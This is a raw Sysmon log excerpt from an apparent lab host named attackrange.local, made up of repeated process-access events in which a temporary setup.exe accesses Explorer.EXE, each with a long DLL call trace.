13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dl